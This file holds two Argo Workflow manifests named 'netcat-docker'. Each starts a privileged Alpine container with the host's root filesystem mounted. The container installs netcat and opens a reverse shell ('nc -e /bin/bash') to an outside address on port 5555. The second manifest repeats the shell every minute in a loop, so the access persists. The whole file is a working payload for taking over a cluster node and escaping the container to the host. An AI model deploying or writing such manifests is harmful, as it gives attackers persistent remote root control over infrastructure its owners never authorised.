apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: netcat-docker
spec:
  entrypoint: netcat-docker
  templates:
    - name: netcat-docker
      container:
        image: alpine:latest
        command: ["/bin/sh", "-c"]
        args:
          - |
            apk add --no-cache netcat-openbsd
            nc -e /bin/bash 192.168.1.105 5555
        securityContext:
          privileged: true
        volumeMounts:
          - name: hostfs
            mountPath: /hostfs
      volumes:
        - name: hostfs
          hostPath:
            path: /
            type: Directory
---
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: netcat-docker
spec:
  schedule: "*/1 * * * *"
  concurrencyPolicy: "Forbid"
  entrypoint: netcat-docker
  templates:
    - name: netcat-docker
      container:
        image: alpine:latest
        command: ["/bin/sh", "-c"]
        args:
          - |
            apk add --no-cache netcat-openbsd
            while true; do nc -e /bin/bash 192.168.1.105 5555; sleep 60; done
        securityContext:
          privileged: true
        volumeMounts:
          - name: hostfs
            mountPath: /hostfs
      volumes:
        - name: hostfs
          hostPath:
            path: /
            type: Directory